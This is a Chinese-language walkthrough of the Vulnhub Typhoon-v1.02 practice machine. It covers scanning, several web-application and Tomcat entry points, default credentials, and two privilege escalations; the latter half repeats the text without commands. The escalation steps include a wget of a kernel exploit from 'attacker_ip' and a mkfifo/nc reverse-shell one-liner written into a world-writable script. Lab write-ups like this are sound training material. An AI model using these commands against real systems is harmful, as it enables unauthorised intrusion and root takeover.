Vulnhub Typhoon-v1.02
字数 2248 2025-08-27 12:33:37

Typhoon-v1.02 靶机渗透测试教学文档

1. 靶机概述

Typhoon-v1.02 是一个来自 Vulnhub 的渗透测试靶机,难度相对简单,提供了多种渗透路径和提权方式。该靶机运行在 Ubuntu 14.04.1 LTS 系统上,内核版本为 3.13.0-32-generic。

2. 环境准备

2.1 靶机下载

2.2 网络配置

确保攻击机和靶机在同一网络段,使用ARP扫描发现靶机IP。

3. 信息收集

3.1 主机发现

arp-scan -l

发现靶机IP为192.168.2.149

3.2 端口扫描

nmap -A 192.168.2.149

扫描结果摘要:

端口 服务 版本信息
21/tcp ftp vsftpd 3.0.2 (允许匿名登录)
22/tcp ssh OpenSSH 6.6.1p1 Ubuntu
25/tcp smtp Postfix
53/tcp domain ISC BIND 9.9.5-3
80/tcp http Apache 2.4.7 (Ubuntu)
110/tcp pop3 Dovecot pop3d
111/tcp rpcbind 2-4
139/tcp netbios-ssn Samba smbd 3.X-4.X
143/tcp imap Dovecot imapd
445/tcp netbios-ssn Samba smbd 4.1.6-Ubuntu
631/tcp ipp CUPS 1.7
993/tcp ssl/imap Dovecot imapd
995/tcp ssl/pop3 Dovecot pop3d
2049/tcp nfs_acl 2-3
3306/tcp mysql MySQL (未授权)
5432/tcp postgresql PostgreSQL DB 9.3.3-9.3.5
8080/tcp http Apache Tomcat/Coyote JSP engine 1.1

3.3 Web目录扫描

dirb http://192.168.2.149

发现以下重要目录:

  • /assets/
  • /calendar/
  • /cgi-bin/ (403)
  • /cms/
  • /drupal/
  • /javascript/
  • /phpmyadmin/
  • /robots.txt

4. 渗透路径

4.1 MongoDB WebUI (phpMoAdmin) 漏洞利用

  1. 访问 /robots.txt 发现 /mongoadmin/ 目录

  2. 查看版本信息:

    http://192.168.2.149/mongoadmin/index.php?action=getStats
    

    版本信息:

    • mongo: 3.0.15
    • mongoPhpDriver: 1.6.16
    • phpMoAdmin: 1.0.9
    • php: 5.5.9-1ubuntu4.26
  3. 利用phpMoAdmin 1.0.9的RCE漏洞获取shell

4.2 SSH登录

  1. 在MongoDB的credentials表中发现账号密码
  2. 尝试SSH登录:
    ssh typhoon@192.168.2.149
    
    密码为从数据库获取的密码
  3. 登录成功,但typhoon用户无sudo权限

4.3 Tomcat Manager

  1. 访问8080端口的Tomcat Manager
  2. 使用默认凭证tomcat/tomcat登录
  3. 上传war文件获取shell

4.4 CMS漏洞利用

  1. Drupal CMS (http://192.168.2.149/drupal/)

    • 使用Metasploit的Drupal模块获取shell
  2. Lotus CMS (http://192.168.2.149/cms/)

    • 使用Metasploit的LotusCMS模块获取shell

4.5 DVWA和XVWA

  1. DVWA (http://192.168.2.149/dvwa/)

    • 默认凭证:admin/password
    • 通过命令注入获取shell
  2. XVWA (http://192.168.2.149/xvwa/)

    • 默认凭证:admin/admin
    • 通过命令注入获取shell

4.6 phpMyAdmin

  1. 访问/phpmyadmin/
  2. 使用默认凭证root/toor登录
  3. 通过日志文件包含获取shell

5. 提权方法

5.1 内核漏洞提权

  1. 查看系统信息:

    uname -a
    lsb_release -a
    

    输出:

    Linux typhoon.local 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
    Ubuntu 14.04.1 LTS
    
  2. 搜索相关exploit:

    searchsploit linux 3.13.0
    

    发现overlayfs本地提权漏洞(37292.c)

  3. 下载并编译exploit:

    wget http://attacker_ip/37292.c
    gcc 37292.c -o exploit
    chmod a+x exploit
    ./exploit
    
  4. 成功获取root权限

5.2 可写文件提权

  1. 发现/tab/script.sh文件权限为777:

    ls -al /tab/
    

    输出:

    -rwxrwxrwx 1 root root 71 Dec 17 16:48 script.sh
    
  2. 写入反弹shell命令:

    echo "mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attacker_ip 8888 >/tmp/f" > /tab/script.sh
    
  3. 在攻击机监听:

    nc -lvvp 8888
    
  4. 执行script.sh获取root shell

6. 获取Flag

成功提权后,查看root目录下的flag文件:

cat /root/root-flag

输出:

<Congrats!>Typhoon_r00t3r!</Congrats!>

7. 总结

Typhoon-v1.02靶机提供了多种渗透路径和提权方法,主要学习点包括:

  1. phpMoAdmin的RCE漏洞利用
  2. 通过数据库泄露凭证进行SSH登录
  3. 多种CMS的漏洞利用
  4. 内核漏洞提权(overlayfs)
  5. 可写文件提权技术

该靶机适合初学者练习信息收集、漏洞利用和权限提升的基本技能。

Typhoon-v1.02 靶机渗透测试教学文档 1. 靶机概述 Typhoon-v1.02 是一个来自 Vulnhub 的渗透测试靶机,难度相对简单,提供了多种渗透路径和提权方式。该靶机运行在 Ubuntu 14.04.1 LTS 系统上,内核版本为 3.13.0-32-generic。 2. 环境准备 2.1 靶机下载 直接下载: Google Drive Torrent下载: Typhoon-v1.02.ova.torrent 2.2 网络配置 确保攻击机和靶机在同一网络段,使用ARP扫描发现靶机IP。 3. 信息收集 3.1 主机发现 发现靶机IP为192.168.2.149 3.2 端口扫描 扫描结果摘要: | 端口 | 服务 | 版本信息 | |------|------|----------| | 21/tcp | ftp | vsftpd 3.0.2 (允许匿名登录) | | 22/tcp | ssh | OpenSSH 6.6.1p1 Ubuntu | | 25/tcp | smtp | Postfix | | 53/tcp | domain | ISC BIND 9.9.5-3 | | 80/tcp | http | Apache 2.4.7 (Ubuntu) | | 110/tcp | pop3 | Dovecot pop3d | | 111/tcp | rpcbind | 2-4 | | 139/tcp | netbios-ssn | Samba smbd 3.X-4.X | | 143/tcp | imap | Dovecot imapd | | 445/tcp | netbios-ssn | Samba smbd 4.1.6-Ubuntu | | 631/tcp | ipp | CUPS 1.7 | | 993/tcp | ssl/imap | Dovecot imapd | | 995/tcp | ssl/pop3 | Dovecot pop3d | | 2049/tcp | nfs_ acl | 2-3 | | 3306/tcp | mysql | MySQL (未授权) | | 5432/tcp | postgresql | PostgreSQL DB 9.3.3-9.3.5 | | 8080/tcp | http | Apache Tomcat/Coyote JSP engine 1.1 | 3.3 Web目录扫描 发现以下重要目录: /assets/ /calendar/ /cgi-bin/ (403) /cms/ /drupal/ /javascript/ /phpmyadmin/ /robots.txt 4. 渗透路径 4.1 MongoDB WebUI (phpMoAdmin) 漏洞利用 访问 /robots.txt 发现 /mongoadmin/ 目录 查看版本信息: 版本信息: mongo: 3.0.15 mongoPhpDriver: 1.6.16 phpMoAdmin: 1.0.9 php: 5.5.9-1ubuntu4.26 利用phpMoAdmin 1.0.9的RCE漏洞获取shell 4.2 SSH登录 在MongoDB的credentials表中发现账号密码 尝试SSH登录: 密码为从数据库获取的密码 登录成功,但typhoon用户无sudo权限 4.3 Tomcat Manager 访问8080端口的Tomcat Manager 使用默认凭证tomcat/tomcat登录 上传war文件获取shell 4.4 CMS漏洞利用 Drupal CMS (http://192.168.2.149/drupal/) 使用Metasploit的Drupal模块获取shell Lotus CMS (http://192.168.2.149/cms/) 使用Metasploit的LotusCMS模块获取shell 4.5 DVWA和XVWA DVWA (http://192.168.2.149/dvwa/) 默认凭证:admin/password 通过命令注入获取shell XVWA (http://192.168.2.149/xvwa/) 默认凭证:admin/admin 通过命令注入获取shell 4.6 phpMyAdmin 访问/phpmyadmin/ 使用默认凭证root/toor登录 通过日志文件包含获取shell 5. 提权方法 5.1 内核漏洞提权 查看系统信息: 输出: 搜索相关exploit: 发现overlayfs本地提权漏洞(37292.c) 下载并编译exploit: 成功获取root权限 5.2 可写文件提权 发现/tab/script.sh文件权限为777: 输出: 写入反弹shell命令: 在攻击机监听: 执行script.sh获取root shell 6. 获取Flag 成功提权后,查看root目录下的flag文件: 输出: 7. 总结 Typhoon-v1.02靶机提供了多种渗透路径和提权方法,主要学习点包括: phpMoAdmin的RCE漏洞利用 通过数据库泄露凭证进行SSH登录 多种CMS的漏洞利用 内核漏洞提权(overlayfs) 可写文件提权技术 该靶机适合初学者练习信息收集、漏洞利用和权限提升的基本技能。